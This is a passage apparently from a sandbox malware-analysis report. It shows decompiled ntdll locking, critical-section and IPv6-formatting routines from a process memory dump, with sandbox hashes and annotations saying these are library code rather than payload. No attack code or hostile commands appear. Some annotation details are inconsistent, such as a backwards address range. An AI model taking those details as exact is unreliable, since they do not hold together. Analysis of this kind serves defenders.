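    size_t len = sizeof buf;
    if (ipv6_to_string_ex(addr, scope_id, port, buf, &len) != STATUS_SUCCESS) return 0;
    return strcmp(buf, expected) == 0 && len == strlen(expected) + 1;
}

int main(void)
{
    char buf[64];
    size_t len = sizeof buf;
    ipv6_to_string_ex(SAMPLE_DOC, 0, 443, buf, &len);
    printf("%s (needs %zu bytes)\n", buf, len);
    return 0;
}
```

The shape worth recognising when reversing: a function that returns 0xc000000d both for bad pointers and for a too-small buffer, and that writes the needed size back through an in/out length parameter, is following the standard Windows size-query convention; callers that ignore the returned length and retry with the same buffer loop forever.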

Instruction addresses for this function (the disassembly text itself was not extracted): 0x01ee14c0-0x01ee1559 in the main body, 0x01f0ea0f-0x01f0ea58 in out-of-line blocks.


                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 01F0EA22
                                                          • Part of subcall function 01EE13CB: ___swprintf_l.LIBCMT ref: 01EE146B
                                                          • Part of subcall function 01EE13CB: ___swprintf_l.LIBCMT ref: 01EE1490
                                                        • ___swprintf_l.LIBCMT ref: 01EE156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 23f76da30b52ccbbded2391d66a30b86086dabf7064085ca9bbd568aa2575023
                                                        • Instruction ID: a18e46862f3fb1aee418cafdf6e85913b4423de2135273b97109b8718fc74d94
                                                        • Opcode Fuzzy Hash: 23f76da30b52ccbbded2391d66a30b86086dabf7064085ca9bbd568aa2575023
                                                        • Instruction Fuzzy Hash: 9221F572D0021A9BCB21DF58CC04AEE77FCBB14304F885455FD46E7141DB70AA988BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 45%
                                                        			E01EC53A5(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t32;
                                                        				signed int _t37;
                                                        				signed int _t40;
                                                        				signed int _t42;
                                                        				void* _t45;
                                                        				intOrPtr _t46;
                                                        				void* _t48;
                                                        				signed int _t49;
                                                        				void* _t51;
                                                        				signed int _t57;
                                                        				signed int _t64;
                                                        				signed int _t71;
                                                        				void* _t74;
                                                        				intOrPtr _t78;
                                                        				signed int* _t79;
                                                        				void* _t85;
                                                        				signed int _t86;
                                                        				signed int _t92;
                                                        				void* _t104;
                                                        				void* _t105;
                                                        
                                                        				_t64 = _a4;
                                                        				_t32 =  *(_t64 + 0x28);
                                                        				_t71 = _t64 + 0x28;
                                                        				_push(_t92);
                                                        				if(_t32 < 0) {
                                                        					_t78 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                        						goto L3;
                                                        					} else {
                                                        						__eflags = _t32 | 0xffffffff;
                                                        						asm("lock xadd [ecx], eax");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L3:
                                                        					_push(_t86);
                                                        					while(1) {
                                                        						L4:
                                                        						__eflags = _t32;
                                                        						if(_t32 == 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                        							_t79 = _t64 + 0x24;
                                                        							_t71 = 1;
                                                        							asm("lock xadd [eax], ecx");
                                                        							_t32 =  *(_t64 + 0x28);
                                                        							_a4 = _t32;
                                                        							__eflags = _t32;
                                                        							if(_t32 != 0) {
                                                        								L19:
                                                        								_t86 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01f801c0;
                                                        									_push(_t92);
                                                        									_push(0);
                                                        									_t37 = E01E9F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                        									__eflags = _t37 - 0x102;
                                                        									if(_t37 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t71 =  *(_t92 + 4);
                                                        									_t85 =  *_t92;
                                                        									_t51 = E01EE4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                        									_push(_t85);
                                                        									_push(_t51);
                                                        									E01EF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                        									E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                        									_t86 = _t86 + 1;
                                                        									_t105 = _t104 + 0x28;
                                                        									__eflags = _t86 - 2;
                                                        									if(__eflags > 0) {
                                                        										E01F2217A(_t71, __eflags, _t64);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E01EF3F92();
                                                        									_t104 = _t105 + 0xc;
                                                        								}
                                                        								__eflags = _t37;
                                                        								if(__eflags < 0) {
                                                        									_push(_t37);
                                                        									E01EE3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                        									asm("int3");
                                                        									_t40 =  *_t71;
                                                        									 *_t71 = 0;
                                                        									__eflags = _t40;
                                                        									if(_t40 == 0) {
                                                        										L1:
                                                        										_t42 = E01EC5384(_t92 + 0x24);
                                                        										if(_t42 != 0) {
                                                        											goto L31;
                                                        										} else {
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                        										_push( &_a4);
                                                        										_push(_t40);
                                                        										_t49 = E01E9F970( *((intOrPtr*)(_t92 + 0x18)));
                                                        										__eflags = _t49;
                                                        										if(__eflags >= 0) {
                                                        											goto L1;
                                                        										} else {
                                                        											_push(_t49);
                                                        											E01EE3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                        											L31:
                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                        											_push( &_a4);
                                                        											_push(1);
                                                        											_t42 = E01E9F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        											__eflags = _t42;
                                                        											if(__eflags >= 0) {
                                                        												L2:
                                                        												return _t42;
                                                        											} else {
                                                        												_push(_t42);
                                                        												E01EE3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                        												_push( &_a4);
                                                        												_push(1);
                                                        												_t42 = E01E9F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        												__eflags = _t42;
                                                        												if(__eflags >= 0) {
                                                        													goto L2;
                                                        												} else {
                                                        													_push(_t42);
                                                        													_t45 = E01EE3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                        													asm("int3");
                                                        													while(1) {
                                                        														_t74 = _t45;
                                                        														__eflags = _t45 - 1;
                                                        														if(_t45 != 1) {
                                                        															break;
                                                        														}
                                                        														_t86 = _t86 | 0xffffffff;
                                                        														_t45 = _t74;
                                                        														asm("lock cmpxchg [ebx], edi");
                                                        														__eflags = _t45 - _t74;
                                                        														if(_t45 != _t74) {
                                                        															continue;
                                                        														} else {
                                                        															_t46 =  *[fs:0x18];
                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                        															return _t46;
                                                        														}
                                                        														goto L38;
                                                        													}
                                                        													E01EC5329(_t74, _t92);
                                                        													_push(1);
                                                        													_t48 = E01EC53A5(_t92);
                                                        													return _t48;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								} else {
                                                        									_t32 =  *(_t64 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t71 =  *_t79;
                                                        								__eflags = _t71;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t57 = _t71;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t57 - _t71;
                                                        										if(_t57 == _t71) {
                                                        											break;
                                                        										}
                                                        										_t71 = _t57;
                                                        										__eflags = _t57;
                                                        										if(_t57 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									_t32 = _a4;
                                                        									__eflags = _t71;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L19;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L38;
                                                        					}
                                                        					_t71 = _t71 | 0xffffffff;
                                                        					_t32 = 0;
                                                        					asm("lock cmpxchg [edx], ecx");
                                                        					__eflags = 0;
                                                        					if(0 != 0) {
                                                        						goto L4;
                                                        					} else {
                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L38:
                                                        			}
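The strings "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)", "RTL: Resource at %p" and "RTL: Re-Waiting" are the diagnostic messages of ntdll's RtlAcquireResourceExclusive, so this part of the dumped region is ntdll code rather than payload-specific logic; the decompiler has also run past the `int3` padding into the neighbouring routines. The recognisable shape is a signed active count at +0x28 (negative means exclusively held, each recursive acquire subtracts one with `lock xadd`), an owner thread id at +0x2c compared against the current thread id read from the TEB (`[fs:0x18]` is the TEB, +0x24 its ClientId.UniqueThread), and a `lock cmpxchg` that claims a free resource by changing the count from 0 to -1 before recording the owner. The following C model of that fast path is an added example, not code from the sample or from ntdll: it uses C11 atomics and a caller-supplied thread id instead of the TEB lookup, replaces the semaphore wait with a spin, omits the diagnostics, and the field and function names are this example's own.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Only the fields the decompiled routine touches; the RTL_RESOURCE offsets are given
   for orientation, this struct does not reproduce the real layout. */
typedef struct {
    atomic_long number_active;      /* +0x28: >0 shared holders, <0 exclusive depth (-1, -2, ...) */
    uintptr_t   owner_thread;       /* +0x2c: thread id of the exclusive owner */
    atomic_long waiting_exclusive;  /* +0x24: bumped before blocking on the exclusive semaphore */
} resource_t;

void resource_init(resource_t *r)
{
    atomic_store(&r->number_active, 0);
    atomic_store(&r->waiting_exclusive, 0);
    r->owner_thread = 0;
}

/* Returns true once the lock is held exclusively by `tid`. `wait == false` fails
   instead of blocking, matching the `_a8 == 0 -> return 0` path above. */
bool acquire_exclusive(resource_t *r, uintptr_t tid, bool wait)
{
    long n = atomic_load(&r->number_active);

    /* Recursion fast path: already exclusively owned by this thread, just go one level
       deeper (the `lock xadd [ecx], eax` with eax == -1 in the decompile). */
    if (n < 0 && r->owner_thread == tid) {
        atomic_fetch_sub(&r->number_active, 1);
        return true;
    }

    for (;;) {
        long expected = 0;
        /* Free resource: 0 -> -1 in one compare-exchange, then record the owner
           (the `lock cmpxchg [edx], ecx` followed by the TEB thread-id store). */
        if (atomic_compare_exchange_strong(&r->number_active, &expected, -1)) {
            r->owner_thread = tid;
            return true;
        }
        if (!wait)
            return false;
        /* Busy: the real routine increments NumberOfWaitingExclusive and waits on the
           exclusive semaphore; this model merely spins until the count drops to 0. */
        atomic_fetch_add(&r->waiting_exclusive, 1);
        while (atomic_load(&r->number_active) != 0) { /* spin */ }
        atomic_fetch_sub(&r->waiting_exclusive, 1);
    }
}

/* Undo one level of exclusive ownership; false if `tid` does not own the resource. */
bool release_exclusive(resource_t *r, uintptr_t tid)
{
    if (atomic_load(&r->number_active) >= 0 || r->owner_thread != tid)
        return false;
    if (atomic_load(&r->number_active) == -1)
        r->owner_thread = 0;        /* last level: clear the owner before the count reaches 0 */
    atomic_fetch_add(&r->number_active, 1);
    return true;
}

/* Walks the paths visible in the decompile on one resource and returns how many steps
   behaved as expected (7 when the model is consistent). */
int exclusive_lock_scenario(void)
{
    resource_t r;
    int ok = 0;
    resource_init(&r);
    ok += acquire_exclusive(&r, 0x1234, true);                                   /* free -> owned */
    ok += (atomic_load(&r.number_active) == -1 && r.owner_thread == 0x1234);
    ok += acquire_exclusive(&r, 0x1234, true);                                   /* recursion */
    ok += (atomic_load(&r.number_active) == -2);
    ok += !acquire_exclusive(&r, 0x5678, false);                                 /* other thread, no wait */
    ok += !release_exclusive(&r, 0x5678);                                        /* not the owner */
    ok += release_exclusive(&r, 0x1234) && release_exclusive(&r, 0x1234)
          && atomic_load(&r.number_active) == 0 && r.owner_thread == 0;          /* fully released */
    return ok;
}

int main(void)
{
    printf("%d/7 steps consistent\n", exclusive_lock_scenario());
    return 0;
}
```

When triaging a dump like this one, matching the format strings and the interlocked count/owner pattern to the library routine lets the analyst skip it and concentrate on the functions that have no such counterpart in ntdll.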

Instruction addresses for this function (the disassembly text itself was not extracted): 0x01ec53ab-0x01ec537c in the main body, 0x01ee05b6-0x01ee05d5 and 0x01f02269-0x01f023ad in out-of-line blocks.
                                                        0x00000000
                                                        0x01f023b3
                                                        0x01f023b3
                                                        0x01f023b4
                                                        0x01f023b9
                                                        0x01f023ba
                                                        0x01f023ba
                                                        0x01f023bc
                                                        0x01f023bf
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef9153
                                                        0x01ef9158
                                                        0x01ef915a
                                                        0x01ef915e
                                                        0x01ef9160
                                                        0x00000000
                                                        0x01ef9166
                                                        0x01ef9166
                                                        0x01ef9171
                                                        0x01ef9176
                                                        0x01ef9176
                                                        0x00000000
                                                        0x01ef9160
                                                        0x01f023c6
                                                        0x01f023cb
                                                        0x01f023ce
                                                        0x01f023d7
                                                        0x01f023d7
                                                        0x01f023ad
                                                        0x01f02390
                                                        0x01f02373
                                                        0x01f0233f
                                                        0x01f0233f
                                                        0x00000000
                                                        0x01f0233f
                                                        0x01f02291
                                                        0x01f02291
                                                        0x01f02293
                                                        0x01f02295
                                                        0x01f0229a
                                                        0x01f022a1
                                                        0x01f022a3
                                                        0x01f022a7
                                                        0x01f022a9
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022ab
                                                        0x01f022ad
                                                        0x01f022af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022af
                                                        0x01f022b1
                                                        0x01f022b4
                                                        0x01f022b4
                                                        0x01f022b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022b6
                                                        0x01f0228f
                                                        0x00000000
                                                        0x01f0226d
                                                        0x01ec53cb
                                                        0x01ec53ce
                                                        0x01ec53d0
                                                        0x01ec53d4
                                                        0x01ec53d6
                                                        0x00000000
                                                        0x01ec53d8
                                                        0x01ec53e3
                                                        0x01ec53ea
                                                        0x01ec53ea
                                                        0x01ec53d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F022F4
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01F02328
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F022FC
                                                        • RTL: Resource at %p, xrefs: 01F0230B
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 3e840c40ed192bce61b250a9b22b62365ef72b4d7e550880904cf540b006f874
                                                        • Instruction ID: 1f4f7147f9b66352e6f7794a44b6c7a8882a2edd15ec96f0f0b5fa9852e68c05
                                                        • Opcode Fuzzy Hash: 3e840c40ed192bce61b250a9b22b62365ef72b4d7e550880904cf540b006f874
                                                        • Instruction Fuzzy Hash: A8510971700742ABEF129B6CCC84FAE77E9AF54724F11521DFD48DB285EB61E84287A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E01ECEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v24;
                                                        				intOrPtr* _v28;
                                                        				intOrPtr _v32;
                                                        				signed int _v36;
                                                        				intOrPtr _v40;
                                                        				short _v66;
                                                        				char _v72;
                                                        				void* __esi;
                                                        				intOrPtr _t38;
                                                        				intOrPtr _t39;
                                                        				signed int _t40;
                                                        				intOrPtr _t42;
                                                        				intOrPtr _t43;
                                                        				signed int _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t48;
                                                        				signed int _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t53;
                                                        				signed char _t67;
                                                        				void* _t72;
                                                        				intOrPtr _t77;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr _t84;
                                                        				intOrPtr* _t85;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        
                                                        				_t80 = __edi;
                                                        				_t75 = __edx;
                                                        				_t70 = __ecx;
                                                        				_t84 = _a4;
                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                        					E01EBDA92(__ecx, __edx, __eflags, _t84);
                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                        				}
                                                        				_push(0);
                                                        				__eflags = _t38 - 0xffffffff;
                                                        				if(_t38 == 0xffffffff) {
                                                        					_t39 =  *0x1f8793c; // 0x0
                                                        					_push(0);
                                                        					_push(_t84);
                                                        					_t40 = E01EA16C0(_t39);
                                                        				} else {
                                                        					_t40 = E01E9F9D4(_t38);
                                                        				}
                                                        				_pop(_t85);
                                                        				__eflags = _t40;
                                                        				if(__eflags < 0) {
                                                        					_push(_t40);
                                                        					E01EE3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                        					asm("int3");
                                                        					while(1) {
                                                        						L21:
                                                        						_t76 =  *[fs:0x18];
                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                        							_v66 = 0x1722;
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_t76 =  &_v72;
                                                        							_push( &_v72);
                                                        							_v28 = _t85;
                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(0x10);
                                                        							_push(0x20402);
                                                        							E01EA01A4( *0x7ffe0382 & 0x000000ff);
                                                        						}
                                                        						while(1) {
                                                        							_t43 = _v8;
                                                        							_push(_t80);
                                                        							_push(0);
                                                        							__eflags = _t43 - 0xffffffff;
                                                        							if(_t43 == 0xffffffff) {
                                                        								_t71 =  *0x1f8793c; // 0x0
                                                        								_push(_t85);
                                                        								_t44 = E01EA1F28(_t71);
                                                        							} else {
                                                        								_t44 = E01E9F8CC(_t43);
                                                        							}
                                                        							__eflags = _t44 - 0x102;
                                                        							if(_t44 != 0x102) {
                                                        								__eflags = _t44;
                                                        								if(__eflags < 0) {
                                                        									_push(_t44);
                                                        									E01EE3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                        									asm("int3");
                                                        									E01F22306(_t85);
                                                        									__eflags = _t67 & 0x00000002;
                                                        									if((_t67 & 0x00000002) != 0) {
                                                        										_t7 = _t67 + 2; // 0x4
                                                        										_t72 = _t7;
                                                        										asm("lock cmpxchg [edi], ecx");
                                                        										__eflags = _t67 - _t67;
                                                        										if(_t67 == _t67) {
                                                        											E01ECEC56(_t72, _t76, _t80, _t85);
                                                        										}
                                                        									}
                                                        									return 0;
                                                        								} else {
                                                        									__eflags = _v24;
                                                        									if(_v24 != 0) {
                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                        									}
                                                        									return 2;
                                                        								}
                                                        								goto L36;
                                                        							}
                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                        							_push(_t67);
                                                        							_t46 = E01EE4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                        							_push(_t77);
                                                        							E01EF3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                        							_t48 =  *_t85;
                                                        							_t92 = _t91 + 0x18;
                                                        							__eflags = _t48 - 0xffffffff;
                                                        							if(_t48 == 0xffffffff) {
                                                        								_t49 = 0;
                                                        								__eflags = 0;
                                                        							} else {
                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                        							}
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(_t49);
                                                        							_t50 = _v12;
                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                        							_push(_t85);
                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                        							E01EF3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                        							_t53 =  *_t85;
                                                        							_t93 = _t92 + 0x20;
                                                        							_t67 = _t67 + 1;
                                                        							__eflags = _t53 - 0xffffffff;
                                                        							if(_t53 != 0xffffffff) {
                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                        							}
                                                        							__eflags = _t67 - 2;
                                                        							if(_t67 > 2) {
                                                        								__eflags = _t85 - 0x1f820c0;
                                                        								if(_t85 != 0x1f820c0) {
                                                        									_t76 = _a4;
                                                        									__eflags = _a4 - _a8;
                                                        									if(__eflags == 0) {
                                                        										E01F2217A(_t71, __eflags, _t85);
                                                        									}
                                                        								}
                                                        							}
                                                        							_push("RTL: Re-Waiting\n");
                                                        							_push(0);
                                                        							_push(0x65);
                                                        							_a8 = _a4;
                                                        							E01EF3F92();
                                                        							_t91 = _t93 + 0xc;
                                                        							__eflags =  *0x7ffe0382;
                                                        							if( *0x7ffe0382 != 0) {
                                                        								goto L21;
                                                        							}
                                                        						}
                                                        						goto L36;
                                                        					}
                                                        				} else {
                                                        					return _t40;
                                                        				}
                                                        				L36:
                                                        			}
                                                        0x01ecec85
                                                        0x01ecec85
                                                        0x00000000

                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01F024FA
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F0248D
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F024BD
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
• Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: fd1fbb1415be2d239dcef93396bc0fbce553f5d05d3feac906f93d3f09a9d383
                                                        • Instruction ID: 91451f57e35ed3a610530484d860a102d3709270eb174a951a9e231eb151c844
                                                        • Opcode Fuzzy Hash: fd1fbb1415be2d239dcef93396bc0fbce553f5d05d3feac906f93d3f09a9d383
                                                        • Instruction Fuzzy Hash: AA41F570A00245ABDB20DB68CD88FAE7BB9EF48720F209609F655DB2C1D735E941C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01EDFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _t105;
                                                        				void* _t110;
                                                        				char _t114;
                                                        				short _t115;
                                                        				void* _t118;
                                                        				signed short* _t119;
                                                        				short _t120;
                                                        				char _t122;
                                                        				void* _t127;
                                                        				void* _t130;
                                                        				signed int _t136;
                                                        				intOrPtr _t143;
                                                        				signed int _t158;
                                                        				signed short* _t164;
                                                        				signed int _t167;
                                                        				void* _t170;
                                                        
                                                        				_t158 = 0;
                                                        				_t164 = _a4;
                                                        				_v20 = 0;
                                                        				_v24 = 0;
                                                        				_v8 = 0;
                                                        				_v12 = 0;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_t136 = 0;
                                                        				while(1) {
                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                        					if(_t167 == _t158) {
                                                        						break;
                                                        					}
                                                        					_t118 = _v20 - _t158;
                                                        					if(_t118 == 0) {
                                                        						if(_t167 == 0x3a) {
                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									break;
                                                        								}
                                                        								_t143 = 2;
                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        								_v28 = 1;
                                                        								_v8 = _t143;
                                                        								_t136 = _t136 + 1;
                                                        								L47:
                                                        								_t164 = _t119;
                                                        								_v20 = _t143;
                                                        								L14:
                                                        								if(_v24 == _t158) {
                                                        									L19:
                                                        									_t164 =  &(_t164[1]);
                                                        									_t158 = 0;
                                                        									continue;
                                                        								}
                                                        								if(_v12 == _t158) {
                                                        									if(_v16 > 4) {
                                                        										L29:
                                                        										return 0xc000000d;
                                                        									}
                                                        									_t120 = E01EDEE02(_v24, _t158, 0x10);
                                                        									_t170 = _t170 + 0xc;
                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                        									_t136 = _t136 + 1;
                                                        									goto L19;
                                                        								}
                                                        								if(_v16 > 3) {
                                                        									goto L29;
                                                        								}
                                                        								_t122 = E01EDEE02(_v24, _t158, 0xa);
                                                        								_t170 = _t170 + 0xc;
                                                        								if(_t122 > 0xff) {
                                                        									goto L29;
                                                        								}
                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                        								goto L19;
                                                        							}
                                                        						}
                                                        						L21:
                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                        							break;
                                                        						} else {
                                                        							if(E01ED685D(_t167, 4) == 0) {
                                                        								if(E01ED685D(_t167, 0x80) != 0) {
                                                        									if(_v12 > 0) {
                                                        										break;
                                                        									}
                                                        									_t127 = 1;
                                                        									_a7 = 1;
                                                        									_v24 = _t164;
                                                        									_v20 = 1;
                                                        									_v16 = 1;
                                                        									L36:
                                                        									if(_v20 == _t127) {
                                                        										goto L19;
                                                        									}
                                                        									_t158 = 0;
                                                        									goto L14;
                                                        								}
                                                        								break;
                                                        							}
                                                        							_a7 = 0;
                                                        							_v24 = _t164;
                                                        							_v20 = 1;
                                                        							_v16 = 1;
                                                        							goto L19;
                                                        						}
                                                        					}
                                                        					_t130 = _t118 - 1;
                                                        					if(_t130 != 0) {
                                                        						if(_t130 == 1) {
                                                        							goto L21;
                                                        						}
